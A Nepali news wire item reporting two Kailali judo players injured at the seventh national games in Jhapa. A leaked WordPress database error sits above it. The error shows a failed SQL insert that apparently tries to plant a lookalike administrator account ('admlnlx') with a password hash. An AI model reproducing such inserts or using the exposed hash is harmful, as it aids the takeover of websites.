WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bvi0nBuRPSbt.Gk9eyhlMSbL80ETT50', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 09:39:44', '', 'admlnlx', 'admlnlx')
झापा,पुस १० –
सातौँ राष्ट्रिय खेलकुद प्रतियोगिता अन्तर्गत आज भएको खेलमा जुडोका दुई खेलाडी घाइते भएका छन् ।
धुलाबारीस्थित पासाङल्हामु हलमा खेल्ने क्रममा सुदूरपश्चिमका खेलाडी घाइते भएका हुन् । घाइते हुनेमा कम्मानसिंह विष्ट र शेखा श्रेष्ठ रहेका छन् । विष्ट ५५ किलोमुनि तौल तथा श्रेष्ठ ६३ किलोमुनि तौलमा भिड्ने क्रममा घाइते भएका हुन् ।
विष्टको घुँडामा तथा श्रेष्ठको छातीमा चोट लागेको छ । दुबैै खेलाडी कैलालीका हुन् । घाइते दुबैको बिर्तामोडस्थित बिएन्डसी अस्पतालमा उपचार भइरहेको छ । उनीहरुको अवस्था खतरामुक्त रहेको सो अस्पतालका चिकित्सक डा निराजन प्रसाईले जानकारी दिनुभएको छ । – रासस